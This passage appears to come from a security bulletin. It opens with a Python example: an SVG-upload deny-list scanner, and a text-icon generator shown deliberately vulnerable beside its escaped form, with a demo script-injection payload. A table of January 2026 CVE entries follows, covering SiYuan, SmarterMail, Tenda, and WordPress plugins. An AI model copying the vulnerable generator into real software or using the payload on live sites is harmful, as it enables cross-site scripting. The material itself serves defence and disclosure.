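"""Added example, not Sesame's or SiYuan's code: (1) a reject-list scanner
for uploaded SVG, (2) a text-icon SVG generator shown in its vulnerable and
its escaped form. Uses only the standard library; for untrusted XML in
production prefer a hardened parser (e.g. defusedxml) to also cover entity
expansion attacks, which plain ElementTree does not limit."""
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

SVG_NS = "http://www.w3.org/2000/svg"
# Elements that can carry or load script in an SVG document.
_ACTIVE_TAGS = {"script", "foreignObject", "set", "animate", "use",
                "iframe", "embed", "object"}


def _local(tag):
    """Strip the namespace from a '{ns}name' tag or attribute."""
    return tag.rsplit("}", 1)[-1]


def svg_upload_is_safe(data: bytes) -> bool:
    """Return False for anything that is not a plain SVG: parse failure,
    non-svg root, active elements, on* handlers, or script-scheme links."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return False
    if _local(root.tag) != "svg":
        return False
    for el in root.iter():
        if _local(el.tag) in _ACTIVE_TAGS:
            return False
        for attr, value in el.attrib.items():
            name = _local(attr).lower()
            if name.startswith("on"):
                return False
            if name == "href" and value.strip().lower().startswith(("javascript:", "data:")):
                return False
    return True


def text_icon_svg_vulnerable(content: str) -> str:
    # Vulnerable: raw interpolation; "</text><script>..." closes the element.
    return (f'<svg xmlns="{SVG_NS}" width="64" height="64">'
            f'<text x="8" y="40">{content}</text></svg>')


def text_icon_svg(content: str, size: int = 64) -> str:
    # Hardened: escape for element content, so < > & cannot form markup,
    # and coerce the numeric parameter so it cannot carry attribute text.
    return (f'<svg xmlns="{SVG_NS}" width="{int(size)}" height="{int(size)}">'
            f'<text x="8" y="40">{escape(content)}</text></svg>')


def element_tags(svg: str):
    """Local tag names of every element in a parsed SVG string."""
    return [_local(el.tag) for el in ET.fromstring(svg).iter()]


def rendered_text(svg: str) -> str:
    """The character data a viewer would draw for the <text> element."""
    return ET.fromstring(svg).find(f"{{{SVG_NS}}}text").text


if __name__ == "__main__":
    payload = "</text><script>alert(1)</script><text>"  # constructed
    print(element_tags(text_icon_svg_vulnerable(payload)))
    print(element_tags(text_icon_svg(payload)), rendered_text(text_icon_svg(payload)))
```

The scanner is a safety net, not a substitute for the serving-side controls in the Saleor entry: even a clean SVG rendered inline from the application's origin inherits that origin, so `Content-Disposition: attachment` and a separate media origin remain the primary defence.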
| siyuan-note--siyuan | SiYuan is a personal knowledge management system. In versions prior to 3.5.4, the markdown feature allows unrestricted server-side HTML rendering, which allows arbitrary file read (local file disclosure). Version 3.5.4 fixes the issue. | 2026-01-19 | not yet calculated | CVE-2026-23850 | https://github.com/siyuan-note/siyuan/security/advisories/GHSA-cv54-7wv7-qxcw https://github.com/siyuan-note/siyuan/issues/16860 https://github.com/siyuan-note/siyuan/commit/b2274baba2e11c8cf8901b0c5c871e5b27f1f6dd https://github.com/siyuan-note/siyuan/commit/f8f4b517077b92c90c0d7b51ac11be1b34b273ad https://github.com/siyuan-note/siyuan/blob/master/kernel/model/file.go#L1035 https://github.com/siyuan-note/siyuan/blob/v3.4.2/kernel/api/filetree.go#L799-L886 |
| siyuan-note--siyuan | SiYuan is a personal knowledge management system. Versions prior to 3.5.4 contain a logic vulnerability in the /api/file/globalCopyFiles endpoint. The function allows authenticated users to copy files from any location on the server's filesystem into the application's workspace without proper path validation. The vulnerability exists in the api/file.go source code. The function globalCopyFiles accepts a list of source paths (srcs) from the JSON request body. While the code checks if the source file exists using filelock.IsExist(src), it fails to validate whether the source path resides within the authorized workspace directory. Version 3.5.4 patches the issue. | 2026-01-19 | not yet calculated | CVE-2026-23851 | https://github.com/siyuan-note/siyuan/security/advisories/GHSA-94c7-g2fj-7682 https://github.com/siyuan-note/siyuan/issues/16860 https://github.com/siyuan-note/siyuan/commit/b2274baba2e11c8cf8901b0c5c871e5b27f1f6dd https://github.com/siyuan-note/siyuan/commit/f8f4b517077b92c90c0d7b51ac11be1b34b273ad |
| siyuan-note--siyuan | SiYuan is a personal knowledge management system. Versions prior to 3.5.4 have a stored Cross-Site Scripting (XSS) vulnerability that allows an attacker to inject arbitrary HTML attributes into the `icon` attribute of a block via the `/api/attr/setBlockAttrs` API. The payload is later rendered in the dynamic icon feature in an unsanitized context, leading to stored XSS and, in the desktop environment, potential remote code execution (RCE). This issue bypasses the previous fix for issue `#15970` (XSS → RCE via dynamic icons). Version 3.5.4 contains an updated fix. | 2026-01-19 | not yet calculated | CVE-2026-23852 | https://github.com/siyuan-note/siyuan/security/advisories/GHSA-7c6g-g2hx-23vv https://github.com/siyuan-note/siyuan/commit/0be7e1d4e0da9aac0da850b7aeb9b50ede7e5bdb |
| sizam--REHub Framework | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in sizam REHub Framework rehub-framework allows Retrieve Embedded Sensitive Data. This issue affects REHub Framework: from n/a through < 19.9.9.4. | 2026-01-22 | not yet calculated | CVE-2025-63051 | https://patchstack.com/database/Wordpress/Plugin/rehub-framework/vulnerability/wordpress-rehub-framework-plugin-19-9-9-sensitive-data-exposure-vulnerability?_s_id=cve |
| SmartDataSoft--Electrician - Electrical Service WordPress | Server-Side Request Forgery (SSRF) vulnerability in SmartDataSoft Electrician - Electrical Service WordPress electrician allows Server Side Request Forgery. This issue affects Electrician - Electrical Service WordPress: from n/a through <= 5.6. | 2026-01-22 | not yet calculated | CVE-2026-22358 | https://patchstack.com/database/Wordpress/Theme/electrician/vulnerability/wordpress-electrician-electrical-service-wordpress-theme-5-6-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| SmartDataSoft--Pool Services | Server-Side Request Forgery (SSRF) vulnerability in SmartDataSoft Pool Services pool-services allows Server Side Request Forgery. This issue affects Pool Services: from n/a through <= 3.3. | 2026-01-22 | not yet calculated | CVE-2025-62741 | https://patchstack.com/database/Wordpress/Theme/pool-services/vulnerability/wordpress-pool-services-theme-3-3-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| SmarterTools--SmarterMail | SmarterTools SmarterMail versions prior to build 9511 contain an authentication bypass vulnerability in the password reset API. The force-reset-password endpoint permits anonymous requests and fails to verify the existing password or a reset token when resetting system administrator accounts. An unauthenticated attacker can supply a target administrator username and a new password to reset the account, resulting in full administrative compromise of the SmarterMail instance. NOTE: SmarterMail system administrator privileges grant the ability to execute operating system commands via built-in management functionality, effectively providing administrative (SYSTEM or root) access on the underlying host. | 2026-01-22 | not yet calculated | CVE-2026-23760 | https://www.smartertools.com/smartermail/release-notes/current https://labs.watchtowr.com/attackers-with-decompilers-strike-again-smartertools-smartermail-wt-2026-0001-auth-bypass/ https://code-white.com/public-vulnerability-list/#authenticationserviceforceresetpassword-missing-authentication-in-smartermail https://www.vulncheck.com/advisories/smartertools-smartermail-authentication-bypass-via-password-reset-api |
| SmarterTools--SmarterMail | SmarterTools SmarterMail versions prior to build 9511 contain an unauthenticated remote code execution vulnerability in the ConnectToHub API method. An attacker could point SmarterMail at a malicious HTTP server that serves a malicious OS command, which the vulnerable application then executes. | 2026-01-23 | not yet calculated | CVE-2026-24423 | https://www.smartertools.com/smartermail/release-notes/current https://code-white.com/public-vulnerability-list/#systemadminsettingscontrollerconnecttohub-missing-authentication-in-smartermail https://www.vulncheck.com/advisories/smartertools-smartermail-unauthenticated-rce-via-connecttohub-api |
| Softwebmedia--Gyan Elements | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Softwebmedia Gyan Elements gyan-elements allows PHP Local File Inclusion. This issue affects Gyan Elements: from n/a through <= 2.2.1. | 2026-01-22 | not yet calculated | CVE-2026-23978 | https://patchstack.com/database/Wordpress/Plugin/gyan-elements/vulnerability/wordpress-gyan-elements-plugin-2-2-1-local-file-inclusion-vulnerability?_s_id=cve |
| solacewp--Solace | Missing Authorization vulnerability in solacewp Solace solace allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Solace: from n/a through <= 2.1.16. | 2026-01-22 | not yet calculated | CVE-2025-68911 | https://patchstack.com/database/Wordpress/Theme/solace/vulnerability/wordpress-solace-theme-2-1-16-broken-access-control-vulnerability?_s_id=cve |
| Sourcecodester--Sourcecodester | A Remote Code Execution (RCE) vulnerability exists in Sourcecodester Modern Image Gallery App v1.0 within the gallery/upload.php component. The application fails to properly validate uploaded file contents. Additionally, the application preserves the user-supplied file extension during the save process. This allows an unauthenticated attacker to upload arbitrary PHP code by spoofing the MIME type as an image, leading to full system compromise. | 2026-01-23 | not yet calculated | CVE-2025-70457 | https://www.sourcecodester.com/php/18572/modern-image-gallery-app-using-php-and-mysql-source-code.html https://github.com/ismaildawoodjee/vulnerability-research/security/advisories/GHSA-8xq6-hjhw-4983 |
| Sourcecodester--Sourcecodester | A DOM-based Cross-Site Scripting (XSS) vulnerability exists in the DomainCheckerApp class within domain/script.js of Sourcecodester Domain Availability Checker v1.0. The vulnerability occurs because the application improperly handles user-supplied data in the createResultElement method by using the unsafe innerHTML property to render domain search results. | 2026-01-23 | not yet calculated | CVE-2025-70458 | https://www.sourcecodester.com/php/18500/domain-availability-checker-using-php-and-javascript-source-code.html https://github.com/ismaildawoodjee/vulnerability-research/security/advisories/GHSA-chm7-vgf7-6f9p |
| SpringBlade--SpringBlade | Incorrect access control in the authRoutes function of SpringBlade v4.5.0 allows attackers with low-level privileges to escalate privileges. | 2026-01-23 | not yet calculated | CVE-2025-70983 | https://github.com/chillzhuang/SpringBlade https://github.com/chillzhuang/SpringBlade/issues/35 https://gist.github.com/old6ma/9c4d2ba32cd8f562cb80796538157912 |
| Steve Truman--Email Inquiry & Cart Options for WooCommerce | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Steve Truman Email Inquiry & Cart Options for WooCommerce woocommerce-email-inquiry-cart-options allows DOM-Based XSS. This issue affects Email Inquiry & Cart Options for WooCommerce: from n/a through <= 3.4.3. | 2026-01-23 | not yet calculated | CVE-2026-24526 | https://patchstack.com/database/Wordpress/Plugin/woocommerce-email-inquiry-cart-options/vulnerability/wordpress-email-inquiry-cart-options-for-woocommerce-plugin-3-4-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| storeapps--Stock Manager for WooCommerce | Cross-Site Request Forgery (CSRF) vulnerability in storeapps Stock Manager for WooCommerce woocommerce-stock-manager allows Cross Site Request Forgery. This issue affects Stock Manager for WooCommerce: from n/a through < 3.6.0. | 2026-01-22 | not yet calculated | CVE-2026-24365 | https://patchstack.com/database/Wordpress/Plugin/woocommerce-stock-manager/vulnerability/wordpress-stock-manager-for-woocommerce-plugin-3-6-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Strategy11 Team--AWP Classifieds | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Strategy11 Team AWP Classifieds another-wordpress-classifieds-plugin allows Retrieve Embedded Sensitive Data. This issue affects AWP Classifieds: from n/a through <= 4.4.3. | 2026-01-23 | not yet calculated | CVE-2026-24593 | https://patchstack.com/database/Wordpress/Plugin/another-wordpress-classifieds-plugin/vulnerability/wordpress-awp-classifieds-plugin-4-4-3-sensitive-data-exposure-vulnerability?_s_id=cve |
| strongholdthemes--Dental Care CPT | Deserialization of Untrusted Data vulnerability in strongholdthemes Dental Care CPT dentalcare-cpt allows Object Injection. This issue affects Dental Care CPT: from n/a through <= 20.2. | 2026-01-22 | not yet calculated | CVE-2025-69035 | https://patchstack.com/database/Wordpress/Plugin/dentalcare-cpt/vulnerability/wordpress-dental-care-cpt-plugin-20-2-php-object-injection-vulnerability?_s_id=cve |
| strongholdthemes--Tech Life CPT | Deserialization of Untrusted Data vulnerability in strongholdthemes Tech Life CPT techlife-cpt allows Object Injection. This issue affects Tech Life CPT: from n/a through <= 16.4. | 2026-01-22 | not yet calculated | CVE-2025-69036 | https://patchstack.com/database/Wordpress/Plugin/techlife-cpt/vulnerability/wordpress-tech-life-cpt-plugin-16-4-php-object-injection-vulnerability?_s_id=cve |
| subhansanjaya--Carousel Horizontal Posts Content Slider | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in subhansanjaya Carousel Horizontal Posts Content Slider carousel-horizontal-posts-content-slider allows DOM-Based XSS. This issue affects Carousel Horizontal Posts Content Slider: from n/a through <= 3.3.2. | 2026-01-22 | not yet calculated | CVE-2026-22347 | https://patchstack.com/database/Wordpress/Plugin/carousel-horizontal-posts-content-slider/vulnerability/wordpress-carousel-horizontal-posts-content-slider-plugin-3-3-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Sully--Media Library File Size | Missing Authorization vulnerability in Sully Media Library File Size media-library-file-size allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Media Library File Size: from n/a through <= 1.6.7. | 2026-01-23 | not yet calculated | CVE-2026-24569 | https://patchstack.com/database/Wordpress/Plugin/media-library-file-size/vulnerability/wordpress-media-library-file-size-plugin-1-6-7-broken-access-control-vulnerability?_s_id=cve |
| sumup--SumUp Payment Gateway For WooCommerce | Missing Authorization vulnerability in sumup SumUp Payment Gateway For WooCommerce sumup-payment-gateway-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects SumUp Payment Gateway For WooCommerce: from n/a through <= 2.7.9. | 2026-01-23 | not yet calculated | CVE-2026-24583 | https://patchstack.com/database/Wordpress/Plugin/sumup-payment-gateway-for-woocommerce/vulnerability/wordpress-sumup-payment-gateway-for-woocommerce-plugin-2-7-9-broken-access-control-vulnerability?_s_id=cve |
| swingmx--swingmusic | Swing Music is a self-hosted music player for local audio files. Prior to version 2.1.4, Swing Music's `list_folders()` function in the `/folder/dir-browser` endpoint is vulnerable to directory traversal attacks. Any authenticated user (including non-admin) can browse arbitrary directories on the server filesystem. Version 2.1.4 fixes the issue. | 2026-01-19 | not yet calculated | CVE-2026-23877 | https://github.com/swingmx/swingmusic/security/advisories/GHSA-pj88-9xww-gxmh https://github.com/swingmx/swingmusic/commit/9a915ca62af1502b9550722df82f5d432cb73de3 |
| Syed Balkhi--Sugar Calendar (Lite) | Missing Authorization vulnerability in Syed Balkhi Sugar Calendar (Lite) sugar-calendar-lite allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Sugar Calendar (Lite): from n/a through <= 3.10.1. | 2026-01-23 | not yet calculated | CVE-2026-24636 | https://patchstack.com/database/Wordpress/Plugin/sugar-calendar-lite/vulnerability/wordpress-sugar-calendar-lite-plugin-3-10-1-broken-access-control-vulnerability?_s_id=cve |
| tabbyai--Tabby Checkout | Insertion of Sensitive Information Into Sent Data vulnerability in tabbyai Tabby Checkout tabby-checkout allows Retrieve Embedded Sensitive Data. This issue affects Tabby Checkout: from n/a through <= 5.8.4. | 2026-01-22 | not yet calculated | CVE-2025-68035 | https://patchstack.com/database/Wordpress/Plugin/tabby-checkout/vulnerability/wordpress-tabby-checkout-plugin-5-8-4-sensitive-data-exposure-vulnerability?_s_id=cve |
| tagDiv--tagDiv Composer | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in tagDiv tagDiv Composer td-composer allows DOM-Based XSS. This issue affects tagDiv Composer: from n/a through <= 5.4.2. | 2026-01-22 | not yet calculated | CVE-2025-50005 | https://patchstack.com/database/Wordpress/Plugin/td-composer/vulnerability/wordpress-tagdiv-composer-plugin-5-4-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| TangibleWP--Listivo Core | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in TangibleWP Listivo Core listivo-core allows PHP Local File Inclusion. This issue affects Listivo Core: from n/a through <= 2.3.77. | 2026-01-22 | not yet calculated | CVE-2025-67957 | https://patchstack.com/database/Wordpress/Plugin/listivo-core/vulnerability/wordpress-listivo-core-plugin-2-3-77-local-file-inclusion-vulnerability?_s_id=cve |
| TangibleWP--MyHome Core | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in TangibleWP MyHome Core myhome-core allows PHP Local File Inclusion. This issue affects MyHome Core: from n/a through <= 4.1.0. | 2026-01-22 | not yet calculated | CVE-2025-67955 | https://patchstack.com/database/Wordpress/Plugin/myhome-core/vulnerability/wordpress-myhome-core-plugin-4-1-0-local-file-inclusion-vulnerability?_s_id=cve |
| Tasos Fel--Civic Cookie Control | Missing Authorization vulnerability in Tasos Fel Civic Cookie Control civic-cookie-control-8 allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Civic Cookie Control: from n/a through <= 1.53. | 2026-01-22 | not yet calculated | CVE-2026-22348 | https://patchstack.com/database/Wordpress/Plugin/civic-cookie-control-8/vulnerability/wordpress-civic-cookie-control-plugin-1-53-broken-access-control-vulnerability?_s_id=cve |
| Taxcloud--TaxCloud for WooCommerce | Missing Authorization vulnerability in Taxcloud TaxCloud for WooCommerce simple-sales-tax allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects TaxCloud for WooCommerce: from n/a through <= 8.3.8. | 2026-01-22 | not yet calculated | CVE-2025-67958 | https://patchstack.com/database/Wordpress/Plugin/simple-sales-tax/vulnerability/wordpress-taxcloud-for-woocommerce-plugin-8-3-8-broken-access-control-vulnerability?_s_id=cve |
| temash--Barberry | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in temash Barberry barberry allows PHP Local File Inclusion. This issue affects Barberry: from n/a through <= 2.9.9.87. | 2026-01-22 | not yet calculated | CVE-2025-68908 | https://patchstack.com/database/Wordpress/Theme/barberry/vulnerability/wordpress-barberry-theme-2-9-9-87-local-file-inclusion-vulnerability?_s_id=cve |
| Tenda--Tenda | Tenda AX3 firmware v16.03.12.11 contains a stack overflow in formSetIptv via the list parameter, which can cause memory corruption and enable remote code execution. | 2026-01-21 | not yet calculated | CVE-2025-69762 | https://river-brow-763.notion.site/Tenda-AX3-Buffer-Overflow-in-formSetIptv-2c9a595a7aef80718ff2c3869d32392d?pvs=74 https://river-brow-763.notion.site/Tenda-AX3-Buffer-Overflow-in-formSetIptv-2c9a595a7aef80718ff2c3869d32392d |
| Tenda--Tenda | Tenda AX3 firmware v16.03.12.11 contains a stack overflow in formSetIptv via the vlanId parameter, which can cause memory corruption and enable remote code execution. | 2026-01-21 | not yet calculated | CVE-2025-69763 | https://river-brow-763.notion.site/Tenda-AX3-Buffer-Overflow-in-formSetIptv-2c9a595a7aef8025a3c6c4b102d95dd4?source=copy_link https://river-brow-763.notion.site/Tenda-AX3-Buffer-Overflow-in-formSetIptv-2c9a595a7aef8025a3c6c4b102d95dd4 |
| Tenda--Tenda | Tenda AX3 firmware v16.03.12.11 contains a stack-based buffer overflow in the formGetIptv function due to improper handling of the stbpvid stack buffer, which may result in memory corruption and remote code execution. | 2026-01-22 | not yet calculated | CVE-2025-69764 | https://river-brow-763.notion.site/Tenda-AX3-Buffer-Overflow-in-formGetIptv-2c9a595a7aef80e9b90fdaa56f51374b?source=copy_link https://river-brow-763.notion.site/Tenda-AX3-Buffer-Overflow-in-formGetIptv-2c9a595a7aef80e9b90fdaa56f51374b |
| Tenda--Tenda | Tenda AX3 firmware v16.03.12.11 contains a stack-based buffer overflow in the formGetIptv function due to improper handling of the citytag stack buffer, which may result in memory corruption and remote code execution. | 2026-01-21 | not yet calculated | CVE-2025-69766 | https://river-brow-763.notion.site/Tenda-AX3-Buffer-Overflow-in-formGetIptv-2c9a595a7aef8043a091e6722b8e255a?source=copy_link https://river-brow-763.notion.site/Tenda-AX3-Buffer-Overflow-in-formGetIptv-2c9a595a7aef8043a091e6722b8e255a |
| Tenda--Tenda | Tenda AX-1806 v1.0.0.1 was discovered to contain a stack overflow in the time parameter of the sub_60CFC function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-01-21 | not yet calculated | CVE-2025-70644 | https://github.com/0-fool/VulnbyCola/blob/main/Tenda/AX-1806/3/1.md |
| Tenda--Tenda | Tenda AX-1806 v1.0.0.1 was discovered to contain a stack overflow in the deviceList parameter of the formSetWifiMacFilterCfg function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-01-21 | not yet calculated | CVE-2025-70645 | https://github.com/0-fool/VulnbyCola/blob/main/Tenda/AX-1806/2/1.md |
| Tenda--Tenda | Tenda AX1803 v1.0.0.1 was discovered to contain a stack overflow in the security parameter of the sub_72290 function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-01-21 | not yet calculated | CVE-2025-70646 | https://github.com/0-fool/VulnbyCola/blob/main/Tenda/AX-1803/5/1.md |
| Tenda--Tenda | Tenda AX1803 v1.0.0.1 was discovered to contain a stack overflow in the security_5g parameter of the sub_727F4 function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-01-21 | not yet calculated | CVE-2025-70648 | https://github.com/0-fool/VulnbyCola/blob/main/Tenda/AX-1803/6/1.md |
| Tenda--Tenda | Tenda AX-1806 v1.0.0.1 was discovered to contain a stack overflow in the deviceList parameter of the formSetMacFilterCfg function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-01-21 | not yet calculated | CVE-2025-70650 | https://github.com/0-fool/VulnbyCola/blob/main/Tenda/AX-1806/1/1.md |
| Tenda--Tenda | Tenda AX-1803 v1.0.0.1 was discovered to contain a stack overflow in the ssid parameter of the form_fast_setting_wifi_set function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-01-21 | not yet calculated | CVE-2025-70651 | https://github.com/0-fool/VulnbyCola/blob/main/Tenda/AX-1803/4/1.md |
| The GNU C Library--glibc | Calling wordexp with WRDE_REUSE in conjunction with WRDE_APPEND in the GNU C Library version 2.0 to version 2.42 may cause the interface to return uninitialized memory in the we_wordv member, which on subsequent calls to wordfree may abort the process. | 2026-01-20 | not yet calculated | CVE-2025-15281 | https://sourceware.org/bugzilla/show_bug.cgi?id=33814 |
| Theme-one--The Grid | Missing Authorization vulnerability in Theme-one The Grid the-grid allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects The Grid: from n/a through < 2.8.0. | 2026-01-22 | not yet calculated | CVE-2026-24368 | https://patchstack.com/database/Wordpress/Plugin/the-grid/vulnerability/wordpress-the-grid-plugin-2-8-0-broken-access-control-vulnerability?_s_id=cve |
| themebeez--Cream Magazine | Missing Authorization vulnerability in themebeez Cream Magazine cream-magazine allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Cream Magazine: from n/a through <= 2.1.10. | 2026-01-23 | not yet calculated | CVE-2026-24615 | https://patchstack.com/database/Wordpress/Theme/cream-magazine/vulnerability/wordpress-cream-magazine-theme-2-1-10-broken-access-control-vulnerability?_s_id=cve |
| themebeez--Orchid Store | Missing Authorization vulnerability in themebeez Orchid Store orchid-store allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Orchid Store: from n/a through <= 1.5.15. | 2026-01-23 | not yet calculated | CVE-2026-24612 | https://patchstack.com/database/Wordpress/Theme/orchid-store/vulnerability/wordpress-orchid-store-theme-1-5-15-broken-access-control-vulnerability?_s_id=cve |
| themebeez--Simple GDPR Cookie Compliance | Missing Authorization vulnerability in themebeez Simple GDPR Cookie Compliance simple-gdpr-cookie-compliance allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Simple GDPR Cookie Compliance: from n/a through <= 2.0.0. | 2026-01-23 | not yet calculated | CVE-2026-24604 | https://patchstack.com/database/Wordpress/Plugin/simple-gdpr-cookie-compliance/vulnerability/wordpress-simple-gdpr-cookie-compliance-plugin-2-0-0-broken-access-control-vulnerability?_s_id=cve |
| themebeez--Universal Google Adsense and Ads manager | Missing Authorization vulnerability in themebeez Universal Google Adsense and Ads manager universal-google-adsense-and-ads-manager allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Universal Google Adsense and Ads manager: from n/a through <= 1.1.8. | 2026-01-23 | not yet calculated | CVE-2026-24603 | https://patchstack.com/database/Wordpress/Plugin/universal-google-adsense-and-ads-manager/vulnerability/wordpress-universal-google-adsense-and-ads-manager-plugin-1-1-8-broken-access-control-vulnerability?_s_id=cve |
| Themefic--Hydra Booking | Incorrect Privilege Assignment vulnerability in Themefic Hydra Booking hydra-booking allows Privilege Escalation. This issue affects Hydra Booking: from n/a through <= 1.1.32. | 2026-01-22 | not yet calculated | CVE-2025-68027 | https://patchstack.com/database/Wordpress/Plugin/hydra-booking/vulnerability/wordpress-hydra-booking-plugin-1-1-32-privilege-escalation-vulnerability?_s_id=cve |
| ThemeGoods--Craft | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Craft craftcoffee allows DOM-Based XSS. This issue affects Craft: from n/a through <= 2.3.6. | 2026-01-22 | not yet calculated | CVE-2025-68538 | https://patchstack.com/database/Wordpress/Theme/craftcoffee/vulnerability/wordpress-craft-coffee-shop-cafe-restaurant-wordpress-theme-2-3-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| ThemeGoods--DotLife | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods DotLife dotlife allows Reflected XSS. This issue affects DotLife: from n/a through < 4.9.5. | 2026-01-22 | not yet calculated | CVE-2025-68520 | https://patchstack.com/database/Wordpress/Theme/dotlife/vulnerability/wordpress-dotlife-theme-4-9-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| ThemeGoods--Grand Magazine | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Grand Magazine grandmagazine allows Reflected XSS. This issue affects Grand Magazine: from n/a through <= 3.5.7. | 2026-01-22 | not yet calculated | CVE-2025-69320 | https://patchstack.com/database/Wordpress/Theme/grandmagazine/vulnerability/wordpress-grand-magazine-theme-3-5-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| ThemeGoods--Grand Restaurant Theme Elements for Elementor | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Grand Restaurant Theme Elements for Elementor grandrestaurant-elementor allows Stored XSS. This issue affects Grand Restaurant Theme Elements for Elementor: from n/a through <= 2.1.1. | 2026-01-22 | not yet calculated | CVE-2025-63026 | https://patchstack.com/database/Wordpress/Plugin/grandrestaurant-elementor/vulnerability/wordpress-grand-restaurant-theme-elements-for-elementor-plugin-2-1-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| ThemeGoods--Grand Spa | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Grand Spa grandspa allows Reflected XSS. This issue affects Grand Spa: from n/a through <= 3.5.5. | 2026-01-22 | not yet calculated | CVE-2025-69321 | https://patchstack.com/database/Wordpress/Theme/grandspa/vulnerability/wordpress-grand-spa-theme-3-5-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| ThemeGoods--Grand Tour | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Grand Tour grandtour allows Reflected XSS. This issue affects Grand Tour: from n/a through < 5.6.2. | 2026-01-22 | not yet calculated | CVE-2025-67952 | https://patchstack.com/database/Wordpress/Theme/grandtour/vulnerability/wordpress-grand-tour-theme-5-6-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| ThemeGoods--Hoteller | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Hoteller hoteller allows Reflected XSS. This issue affects Hoteller: from n/a through < 6.8.9. | 2026-01-22 | not yet calculated | CVE-2025-68518 | https://patchstack.com/database/Wordpress/Theme/hoteller/vulnerability/wordpress-hoteller-theme-6-8-9-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| ThemeGoods--Photography | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeGoods Photography photography allows PHP Local File Inclusion. This issue affects Photography: from n/a through < 7.7.5. | 2026-01-22 | not yet calculated | CVE-2025-68510 | https://patchstack.com/database/Wordpress/Theme/photography/vulnerability/wordpress-photography-theme-7-7-5-local-file-inclusion-vulnerability?_s_id=cve |
| ThemeGoods--PhotoMe | Server-Side Request Forgery (SSRF) vulnerability in ThemeGoods PhotoMe photome allows Server Side Request Forgery. This issue affects PhotoMe: from n/a through < 5.7.2. | 2026-01-22 | not yet calculated | CVE-2026-24381 | https://patchstack.com/database/Wordpress/Theme/photome/vulnerability/wordpress-photome-theme-5-7-2-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| ThemeHunk--Contact Form & Lead Form Elementor Builder | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in ThemeHunk Contact Form & Lead Form Elementor Builder lead-form-builder allows Retrieve Embedded Sensitive Data. This issue affects Contact Form & Lead Form Elementor Builder: from n/a through <= 2.0.1. | 2026-01-22 | not yet calculated | CVE-2025-68046 | https://patchstack.com/database/Wordpress/Plugin/lead-form-builder/vulnerability/wordpress-contact-form-lead-form-elementor-builder-plugin-2-0-1-sensitive-data-exposure-vulnerability?_s_id=cve |
| themepassion--Ultra Portfolio | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in themepassion Ultra Portfolio ultra-portfolio allows Blind SQL Injection. This issue affects Ultra Portfolio: from n/a through <= 6.7. | 2026-01-22 | not yet calculated | CVE-2025-69180 | https://patchstack.com/database/Wordpress/Plugin/ultra-portfolio/vulnerability/wordpress-ultra-portfolio-plugin-6-7-sql-injection-vulnerability?_s_id=cve |
| ThemeREX--Sound \| Musical Instruments Online Store | Deserialization of Untrusted Data vulnerability in ThemeREX Sound \| Musical Instruments Online Store musicplace allows Object Injection. This issue affects Sound \| Musical Instruments Online Store: from n/a through <= 1.6.9. | 2026-01-22 | not yet calculated | CVE-2025-69079 | https://patchstack.com/database/Wordpress/Theme/musicplace/vulnerability/wordpress-sound-musical-instruments-online-store-theme-1-6-9-deserialization-of-untrusted-data-vulnerability?_s_id=cve |
